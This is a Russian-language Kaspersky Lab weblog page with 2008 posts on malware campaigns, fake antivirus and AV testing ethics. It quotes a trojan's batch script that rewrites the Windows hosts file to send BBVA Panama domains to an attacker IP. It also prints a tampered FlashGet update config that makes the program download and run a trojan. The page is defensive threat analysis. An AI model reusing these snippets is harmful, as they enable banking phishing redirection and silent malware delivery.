| |
Главная / Веблог
Веблог «Лаборатории Касперского»
|
Конкурс «обфускации» вредоносного кода под названием Race to Zero, который должен пройти на хакерской конференции Defcon в августе этого года, уже вызвал жаркие споры. Как мне кажется, любое действие либо этично, либо неэтично... и я убежден, что «ради удовольствия» создавать новый вредоносный код, способный обойти антивирусную защиту, неэтично. Мы — антивирусные эксперты — всегда против создания вредоносного кода по каким бы то ни было причинам. Единственным разумным оправданием создания вредоносного ПО в тестовых целях когда-то можно было считать следующий аргумент: «нам надо создать новые варианты кода, чтобы подробно изучить способы атаки». Но ребята, давайте смотреть правде в глаза: сегодня мы сталкиваемся с тысячами новых вариантов вредоносных программ. У нас более чем достаточно «живого» вредоносного кода, пригодного для анализа и изучения с целью улучшения технологий защиты от вредоносного ПО. Поэтому, даже если этот аргумент когда-то можно было принять: «ну, может быть, только один раз, ничего страшного, если уж так надо», то в 2008 году он уже НЕ может быть оправдан. Утверждение, что «сигнатурный антивирус умер, надо искать эвристические, статистические и поведенческие методы обнаружения новых угроз» — это просто дешевый пропагандистский трюк. Уже несколько лет никто — вообще никто — в антивирусной индустрии не рассчитывает только на сигнатурные методы. А звучит заявление авторов «конкурса» так, словно большинство антивирусных сканеров провалят их «тесты», потому что обойти сигнатурные сканеры и статические эвристики не проблема. Для тысяч электронных мошенников посыл ясен: «даёшь обфускацию кода!» Этот «конкурс» стимулирует их к поиску и разработке новых технологий обфускации. А поскольку они и так этим занимаются, то они просто еще поднажмут. Благодарности за это от нас вы не услышите: антивирусным лабораториям такой стимул не нужен, им и так есть чем заняться. Наиболее позитивно настроенные граждане называют этот «конкурс» формой тестирования продуктов. Неверно! Тестирование антивирусных продуктов, как и любое другое тестирование ПО, осуществляется профессионалами, такими как, например, Андреас Клементи, Андреас Маркс или редакция Virus Bulletin на основе справедливых, этичных и научно-обоснованных правил. Вот так всё делается в приличных антивирусных кругах. «Конкурс» Race to Zero/DefCon: - Проводится НЕ профессиональными тестерами — без комментария
- НЕ основан на справедливых правилах — до сих пор никаких публичных контактов с производителями антивирусного ПО не наблюдалось
- НЕ имеет научной основы — описание тестового стенда отсутствует как таковое
- И последнее — по порядку, но не по значению. Это НЕЭТИЧНО на все 100%. Писать вредоносное ПО — преступление. Вот и все.
Наконец, как насчет Федерального закона США о компьютерных преступлениях? И других законодательных актов? Этот «конкурс» вообще законно проводить на территории США? Агентство, отвечающее за борьбу с электронной преступностью, в курсе? В общем, всё сводится к следующему: нужны ли публичные и неструктурированные «конкурсы тестирования» преступных технологий, проводимые людьми без соответствующей квалификации и репутации? Может быть, стоит провести «конкурс» ограбления банка в реальной среде для проверки банковских систем безопасности? Или «пробную» раздачу наркотиков в школах, чтобы проверить работу наркополиции? До абсурда можно довести что угодно — в том числе анализ кода. Давайте вздохнем поглубже и займемся разработкой технологий защиты, а не «модификацией вредоносного кода ради удовольствия»!
|
Буквально несколько дней назад мы вернулись с конференции в Панаме, в ходе которой обсуждалась проблема кибер-преступности в Центральной Америке. Хотя по внедренности Интернета в повседневную жизнь лидирует Коста-Рика, наибольшее количество успешно реализованных атак приходится на Панаму. 
Главным образом эти атаки были направлены против банков страны. Панама в данном случае является "лакомым кусочком" для преступников, благодаря тому, что в ней находится огромное количество банков, для которых созданы благоприятные условия, а также специальная коммерческая зона, деятельность которой не облагается налогами. В нашей презентации мы рассказывали о том, что атаки сегодня зачастую имеют локальный характер. Иными словами, они создаются в определенной стране, для определенного контингента и, как правило, не выходят за пределы региона или даже отдельного госсударства. Таким образом, злоумышленники стараются минимизировать возможность быстрого детектирования угроз антивирусными компаниями. Одна из таких атак была совершена 16 апреля, вскоре после нашего возвращения. Пользователям электронной почты в домене ".pa" были разосланы спам-письма с предложением посмотреть почтовую открытку широко известного в Латинской Америке сервиса "Gusanito.com". При клике на ссылку автоматически загружался файл "001002003.exe", который в свою очередь выполнял следующие операции: @echo off
title AVERSINODETECTA----------HAHAHAHAHAHAHAHAHAHAHA
del c:\WINDOWS\system32\drivers\etc\hosts
copy hosts c:\WINDOWS\system32\drivers\etc\hosts
echo 75.127.*.* www.bbvapanama.com >>%windir%\System32\drivers\etc\hosts
echo 75.127.*.* bbvapanama.com >>%windir%\System32\drivers\etc\hosts
echo 75.127.*.* www.bbvanetpanama.com >>%windir%\System32\drivers\etc\hosts
echo 75.127.*.* bbvanetpanama.com >>%windir%\System32\drivers\etc\hosts
exit
echo > "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpfile0.tmp" Как видно, зловред добавлял в файл локальных DNS специальную запись IP для доменных имен банка BBV Panama. Можно также предположить, что автор этого вируса сам родом из латинской америки. В поле «tilte» записана фраза на испанском, которую можно было бы перевести как: «а вдруг не заметят». Если же жертва данного зловреда — клиент указанного банка — в какой-то момент пробовала зайти на его страницу, автоматически открывался фишинговый сайт, в точности повторяющий оригинальный: 
На данный момент Антивирус Касперского детектирует данный зловред как Trojan.Win32.Qhost.alc Интересно, что спустя 3 дня с момента начала атаки и до сих пор данная угроза детектируется только 2-мя антивирусами, один их которых —Антивирус Касперского. Это подтверждает тот факт, что злоумышленники стараются ограничить распространение своих зловредов в пределах какой-то определенной территории и тем самым гарантировать невозможность их детектирования в течение длительного времени антивирусными компаниями.
|
Ох уж эти числа… Простые числа, магические числа, счастливые и несчастливые числа. Одни люди боятся чисел, другие не понимают их, третьи любят, четвертые попросту игнорируют. А я… я люблю числа, всегда прислушиваюсь к тому, как они звучат, и пробую на зуб. В воскресенье мы летели из Нью-Йорка в Бостон. Наблюдая, как компьютер распечатывал мой посадочный талон и рассматривая числа на листочке, я понял, что день выдался особый. Число 13 в этот день было гвоздем программы.
13 – дата
13 – номер рейса: цифры 2 и 0 не в счет, они «гасятся» номером выхода
13 – время посадки в самолет
А КРОМЕ ТОГО: В шестнадцатеричной системе счисления 3 + A – это то же самое, что в десятеричной 3 + 10 =13. Число 13 встречается на посадочном талоне четыре раза! Вот это да! Поразительно, что я выжил! Если вы верите, что число 13 приносит несчастье, то наверняка захотите узнать, как мне это удалось. Не знаю – возможно, дело в том, что вылет был в 2.00 PM (в 14 часов). Или в том, что на дворе апрель 2008-го, и если сложить цифры месяца и года, получится 14. К тому же в этом году это был мой 14-й перелет, а вовсе не 13-й. Так или иначе, я выжил, и в Бостоне завершаю поездку по США. Перелет номер 15 в этом году – завтра. Посмотрим, какие цифры будут сопутствовать ему.
|
Наверняка многие из наших читателей уже не раз замечали, что киберзлоумышленники приурочивают свои атаки к знаменательным датам. Эта практика достаточно эффективна, в особенности если праздник является всемирно известным. Как правило, именно в такие дни наивные пользователи легко поддаются на уловки мошенников, чем и пользуются последние в целях распространения вредоносного ПО. Из последних подобных атак можно вспомнить, к примеру, рассылку вредоносных «валентинок». Вчера, 31 марта, накануне Всемирного дня дураков, злоумышленники-операторы бот-сетей инициировали волну спам-рассылок, письма которых содержали ссылки на веб-страницу с новой модификацией одиозного «штормового червя» Zhelatin. Антивирус Касперского детектирует данную модицкацию как Email-Worm.Win32.Zhelatin.wq; продукты других антивирусных компаний на момент появления посланий ее не детектировали. Схема работы злоумышленников все та же: - Подготовка бот-машин — плацдармов для распространяемого зловреда.
- Рассылка спамовых писем.
- Автоматическая загрузка вредоносной программы при посещении жертвой специально подготовленной страницы.
Приведем пример содержимого одного из таких сайтов: 
Как видим, если зловред не загружался автоматически, пользователь провоцировался на скачивание вручную — путем клика по изображению или по ссылке. Имена исполняемых файлов зловреда варьируются. Вот несколько из них: «funny.exe», «foolsday.exe», «kickme.exe». Размер файлов в среднем составляет 137 Кб и может изменяться в зависимости от модификации. Поскольку злоумышленники имеют полный контроль над машинами, входящими в состав ботнета, а также отслеживают детектирование своих творений антивирусными продуктами, очевидно, появятся очередные модификации Zhelatin. В настоящее время мы следим за зараженными данным червем веб-сайтами. Советуем всем пользователям удостовериться в ежечасном обновлении антивирусных продуктов и не попадаться на хитрости злоумышленников!
|
Несколько дней назад мы начали получать сообщения от пользователей о том, что на их компьютерах антивирус стал обнаруживать троянские программы в каталоге популярного клиента-загрузчика FlashGet. Анализ ситуации показал, что проблема существует у пользователей этой программы по всему миру. Основными симптомами является появление в системе файлов с именами inapp4.exe, inapp5.exe, inapp6.exe, детектируемых Антивирусом Касперского как Trojan-Dropper.Win32.Agent.exo, Dropper.Win32.Agent.ezo и Trojan-Dowloader.Win32.Agent.kht. Ситуация выглядела очень странной, т.к. никаких других троянских программ, через которые они могли попасть в систему, не обнаруживалось. У некоторых из пострадавших пользователей были установлены все патчи для операционных систем и браузеров. Каким же образом вредоносные программы проникали в компьютеры? Наше внимание сразу привлекло месторасположение троянцев — каталог самого FlashGet. Проверка выявила, что кроме троянцев свежую дату создания и модификации имеет файл FGUpdate3.ini (синим цветом выделены отличия от оригинального файла): [Add] fgres1.ini=1.0.0.1035 FlashGet_LOGO.gif=1.0.0.1020 inapp4.exe=1.0.0.1031[AddEx]
[fgres1.ini]
url=http://dl.flashget.com/flashget/fgres1.cab
flag=16
path=%product%
[FlashGet_LOGO.gif]
url=http://dl.flashget.com/flashget/FlashGet_LOGO.cab
flag=16
path=%product% [inapp4.exe]
url=http://dl.flashget.com/flashget/appA.cab
flag=2
path=%product% Странно, но ссылка на файл inapp4.exe, являющийся троянцем, вела на настоящий сайт FlashGet. Именно оттуда он загружался в виде appA.cab. Никакой информации об инциденте на сайте FlashGet обнаружено не было, зато изучение форума пользователей программы выявило множественные сообщения о случаях заражения и полное молчание со стороны разработчиков. Судя по информации, найденной нами в сети, первые случаи заражения были зафиксированы еще 29 февраля. Последний известный нам — 9 марта. 10 дней легальная программа выступала в роли троянца-загрузчика, осуществляя установку и запуск в системах пользователей троянских программ, размещенных на сайте компании-производителя! В настоящий момент троянцы уже удалены с сайта, а FGUpdate3.ini (который также загружается из сети) приведен в исходное состояние. Способов, при помощи которых FlashGet может быть превращен в троянца-загрузчика, нам видится два. Первый из них самый очевидный — произошел взлом сайта компании-производителя, в результате чего злоумышленникам удалось подменить стандартный файл конфигурации на указывающий на троянскую программу, размещенную там же! Почему хакеры не использовали другой сайт, мы не знаем — возможно, для лучшей маскировки (ссылка на сайт FlashGet в конфиг-файле может не вызвать подозрений). Мы решили проверить, можно ли использовать этот трюк для загрузки любых других файлов с любых других сайтов? Ответ — да. Достаточно добавить в файл FGUpdate3.ini собственную ссылку на что угодно и это будет автоматически загружено и запущено на вашем компьютере при каждом запуске FlashGet. Даже если вы не нажимаете кнопку «Обновить» — FlashGet самостоятельно использует информацию из ini-файла! «Уязвимость» существует во всех версиях FlashGet 1.9.xx. Это означает, что несмотря на то, что на данный момент проблема с взломом сайта FlashGet решена, уязвимость в системе пользовательской безопасности остаётся. Любая троянская программа может изменить локальный ini-файл FlashGet, заставив его работать как троянец-загрузчик — и это является вторым из двух упомянутых выше способов. Стоит ли говорить о том, что FlashGet обычно относится пользователями в разряд «доверенных» приложений и ему позволяется любая сетевая активность и обращения к любым сайтам? Официальной реакции от китайской компании-разработчика FlashGet на настоящий момент нет. Истинные причины произошедшего остаются неизвестными и никаких гарантий того, что это не случится снова, не существует. Делайте собственные выводы... Если вы находитесь в окрестностях Ганновера или уже оказались на выставке СeBIT, не забудьте, пока не поздно, заглянуть на наш стенд J16 в зале 6. Кажется, вся выставка бежит на наш стенд за книгой Жени Касперского «Компьютерное Zловредство» (в английском переводе «Malware»). В книге — полный и всесторонний обзор вредоносного ПО, в том числе и история его развития. Читается книга просто отлично! На мой взгляд, эта книга должна быть в библиотеке любого, кто интересуется компьютерной безопасностью. Вчера у нас на стенде прошла традиционная русская дискотека, так что разошлись все поздно. Но на фото видно, что мы все равно держимся молодцом и готовы к организованному «Лабораторией Касперского» на CeBIT круглому столу вирусных аналитиков, который вот-вот начнется.  Слева направо: Саша, Эдди, Магнус, ВиталийКстати, главная тема CeBIT в этом году — «Green IT». Мы опередили время — не зря мы уже много лет выпускаем свои продукты в зеленой цветовой гамме!
Вредоносная программа MonaRonaDona |
|
На прошлой неделе зарегистрировано большое число жалоб на вредоносную программу, известную как MonaRonaDona. После установки на компьютер пользователя MonaRonaDona выводит на экран следующее предупреждение: Будучи запущена, программа завершает приложения, названия которых в заголовке окна Windows содержат следующий текст: Date And Time
Windows Task Manager
Registry Editor
Irfanview
Google Talk
Macromedia
Adobe
Microsoft Visual
Windows Media Player
Winamp
Microsoft Office
Microsoft Excel
Microsoft Word
Messenger Кроме того, в заголовке окна Internet Explorer появляется название MonaRonaDona. Как именно вредоносная программа попадает на компьютер пользователя, мы пока не знаем. При первом запуске она выполняет только одно действие – вносит себя в список программ, автоматически запускающихся при загрузке Windows. Поскольку признаки заражения проявляются не сразу, жертве трудно определить, когда и как вредоносная программа могла проникнуть на компьютер. Создается впечатление, мы имеем дело с творением компьютерного хулигана, заинтересованного лишь в нанесение ущерба владельцам компьютеров. Однако если копнуть глубже, откроется совершенно иная картина. Несмотря на то, что в момент заражения MonaRonaDona никак себя не проявляет, в отличие от большинства современных вредоносных программ, она предстает перед пользователем во всей красе. Очевидно, цель такого подхода – побудить пользователя искать информацию о вредоносной программе в своей любимой поисковой системе. Поиск имени MonaRonaDona в интернете приведет пользователя к сайтам, предлагающим следующую информацию: Или на Digg.com: По ссылке попадаем на следующую страницу: Кстати, когда ко мне попала эта вредоносная программа, ни один антивирусный продукт ее не обнаруживал. Но при этом названия антивирусов, перечисленных на скриншоте выше, знакомы каждому пользователю, в отличие от никому не известного Unigray antivirus. Выясняется, что сайту unigray.com всего пара недель от роду, что само по себе подозрительно. Кроме того, для антивирусного продукта, созданного совсем недавно, Unigray Antivirus декларирует наличие неправдоподобно большой антивирусной базы. Интересно, что «число записей» указано в коде продукта в явном виде, но при запуске Live Update программа сообщает об установке последних обновлений антивирусных баз (на самом деле никакого обновления не происходит). Это тоже выглядит неубедительно. Копнув еще глубже, я выяснил, что продукт «обнаруживает» лишь следующие вредоносные программы: Win32.CIH
BlazeFind
e2give
Hancer
Cydoor
PowerStrip
EliteBar
DyFuCa
2020Search
Aurora
Spy Trooper
SpySheriff
CoolWebSearch
W32.Gampxia!html
W32.Gampxia
W32.Imaut.CN
W32.Selex.B@mm
Win32.ch
MonaRonaDona Программа выдала почти 200 ложных срабатываний на совершенно чистой системе, выбирая вредоносные программы из приведенного выше списка, причем, судя по всему, случайным образом. Интересно, что на компьютере, зараженном MonaRonaDona, «антивирус» также выдавал ложные срабатывания на чистых файлах, определяя их как MonaRonaDona. Странно, когда только что созданная программа обнаруживает MonaRonaDona при том, что общепризнанным антивирусным продуктам эта вредоносная программа незнакома. При дальнейшем анализе Unigray Antivirus я обнаружил, что программа содержит алгоритм удаления лишь одного представителя вредоносного ПО – угадайте, какого. Ну конечно – MonaRonaDona! Unigray Избавит вас от нее всего за 39 долларов 90 центов. Выгодное предложение, не правда ли? Сравнение кода MonaRonaDona и Unigray Antivirus показывает, что у этих программ очень много общего, не оставляя сомнений в том, что за обеими программами стоит одна и та же группа вирусописателей. Эти люди прекрасно овладели приемами социальной инженерии и научились манипулировать пользователями, побуждая их совершать выгодные киберпреступникам действия. Продукты «Лаборатории Касперского» обнаруживают вредоносную программу MonaRonaDona как Trojan.Win32.Monagrey.a, а Unigray Antivirus как not-a-virus:FraudTool.Win32.Unigray.a.
Trojan.Win32.Qhost против Banamex |
|
В ночь с 19 на 20 февраля 2008 на мексиканские электронные адреса стали приходить письма, похожие на стандартные сообщения сервиса поздравительных открыток TarjetasNico. 
Конечно же, эти письма были поддельными. Ссылки, содержащиеся в них, вели на веб-страницу, не имеющую никакого отношения к реальному сервису. При переходе по любой из ссылок в теле письма пользователь перенаправлялся на сайт http://72.9.145.130/~rockybob/. 
На нем выполнялся специальный PHP-скрипт, который производил автоматическую загрузку с другого сайта — http://www.subterraneos.net/ — вредоносного файла «TarjetasNico.exe».
Интересно отметить, что на странице, с которой производилась непосредственная загрузка троянца на ПК ничего не подозревающего пользователя, находилось сообщение от администратора, гласившее, что сайт был атакован менее 48 часов назад и что некоторые сервисы, возможно, могут работать некорректно: 
После полной загрузки файл запускался на исполнение. Иконка зловреда была также полностью скопирована с оригинального сайта поздравительных открыток: 
Чтобы наивный пользователь ни о чем не догадался, по окончании загрузки вредоносного файла в окне браузера Internet Explorer демонстрировалась реальная интернет-открытка. Ее текст интересен тем, что злоумышленники пытались вызвать жалость со стороны получателя. Возможно, такая тактика использовалась с расчетом на дальнейшее распространение послания жертвой по своим контактам. 
Наряду с исполнением зловреда и показом данной открытки происходило изменение записей локальных DNS-серверов в файле «C:\WINDOWS\system32\drivers\etc\hosts». Таким образом, все следующие интернет-запросы пользователя должны были переадресовываться на сайты злоумышленников: www.banamex.com
banamex.com
banamex.com.mx
www.banamex.com.mx
www.bancanetempresarial.banamex.com.mx
bancanetempresarial.banamex.com.mx
www.bancanetempresarial.banamex.com
bancanetempresarial.banamex.com
boveda.banamex.com
www.boveda.banamex.com
www.boveda.banamex.com.mx
boveda.banamex.com.mx Отчетливо видно, что названная троянская программа была «заточена» именно под клиентов мексиканского банка Banamex. Если компьютер кого-либо из них оказывался инфицированным, все попытки открыть любой из перечисленных URL завершались открытием фишинговой страницы. 
Если жертва вводила свои банковские реквизиты на фальшивом сайте, они мгновенно оказывались в руках преступников. Удалось установить, что письма с приглашением просмотреть поздравительную открытку были отосланы из Голландии, фишинговый хостинг находился в США, а адресатами, что вполне логично, оказались владельцы электронных почтовых аккаунтов на мексиканских доменах. Анализ кода вредоносного файла показал, что зловред был написан знатоками VisualBasic и испанского языка. Возможно, он был создан непосредственно в Мексике. Мы продолжили исследование и обнаружили нечто очень интересное: 
Данная страница использовалась злоумышленниками для отправки «поздравительных» сообщений. Как видим, она позволяет целиком создавать текст письма с помощью модифицируемого HTML-кода, задавать количество отправляемых сообщений, адреса получателей, а также вкладывать в письма файлы. Все упомянутые сайты злоумышленников в настоящее время сохраняют свою активность. Антивирус Касперского детектирует загружаемый вредоносный файл как Trojan.Win32.Qhost.aha. Мы предупреждаем всех пользователей, и в особенности клиентов Banamex, быть крайне бдительными и не попадаться на уловки мошенников.
|
Многие источники уже говорили о том, что грядет распространение вредоносного кода под видом поздравлений ко Дню святого Валентина. Конечно, так оно и произошло. Со вчерашнего дня (12 февраля) мы начали получать образцы спамовых сообщений с приглашениями просмотра «валентинок». Пример подобного послания: Smiley Kiss
http://217.***.***.***/ При переходе по такой ссылке пользователь попадает на сайт с картинкой праздничной тематики. Вот несколько из них: 
«Действующими лицами» некоторых их «валентинок» являются известные в России мультипликационные персонажи (к примеру, Смешарики). На других изображены персонажи Walt Disney. Интересно отметить, что при открытии одной и той же ссылки через некоторый промежуток времени можно увидеть уже совсем другую картинку. Это указывает на то, что злоумышленники контролируют вредоносные хостинги, стараясь привлечь внимание наивных пользователей. В любом случае, результат просмотра «валентинок» для пользователя всегда один — загрузка вредоносного файла «valentine.exe» на его ПК. Интересно также то, что некоторые их сайтов с «валентинками» из-за большого количества одновременных запросов зачастую становятся практически недоступными. Тем не менее, по прошествии некоторого времени жертвы могут снова любоваться долгожданной поздравительной картинкой. :) На сегодняшний день количество таких писем, зафиксированных нами, составляет около 5% всего почтового трафика.
Антивирус Касперского детектирует данный вредоносный код как Packed.Win32.Tibs.ic. Рекомендации пользователям: - Поддерживайте базы вашего Антивируса обновленными, т.к. вредоносный код на страницах злоумышленников постоянно меняется; в некоторых случаях новые модификации появляются менее чем за один час.
- Не попадайтесь на уловки злоумышленников и крючок собственного любопытства — не открывайте подобные письма и тем более ссылки в них.
Создание организации AMTSO |
|
Возможно, вы еще об этом не слышали: недавно более 40 антивирусных экспертов и специалистов по тестированию собрались в Бильбао (Испания), чтобы принять устав Организации по стандартам тестирования антивирусов — Anti-Malware Testing Standards Organisation (AMTSO). Основная цель организации — разработать принципы и стандарты тестирования программного обеспечения для защиты от информационных угроз. Для чего нужен подобный орган? Прежде всего, за последние 10 лет антивирусное ПО претерпело огромные изменения, а большинство используемых на сегодняшний день тестов за этим развитием не поспевают. Для оценки эффективности новых технологий необходимы новые и усовершенствованные тесты. Кроме того, одна из задач AMTSO способствовать созданию тестов, анализирующих работу антивирусных программ в условиях, максимально приближенных к реальным. Я участвовал в обсуждении этого вопроса еще во времена семинара по тестированию антивирусных продуктов (AV Testing Workshop), и для меня совершенно очевидно, что создание новой организации — это большой шаг в верном направлении. На сегодняшний день группа состоит из специалистов в области защиты от информационных угроз и тестирования. Предполагается также задействовать представителей академических кругов, участие которых в работе AMTSO поможет организации занять нейтральную позицию по отношению к разработчикам ПО и используемым технологическим решениям. Интересно, какими окажутся результаты работы организации. Как член временного подкомитета по правилам и стандартам, я, очевидно, получу возможность внести свой вклад в общее дело. Может оказаться, что результаты, показываемые антивирусными решениями, будут ниже, чем в используемых ныне тестах. Но это не так уж и плохо — при условии, что результаты тестов будут отражать реальную способность антивирусных продуктов противостоять нынешним постоянно меняющимся угрозам. Более подробную информацию можно найти на сайте AMTSO.
| |
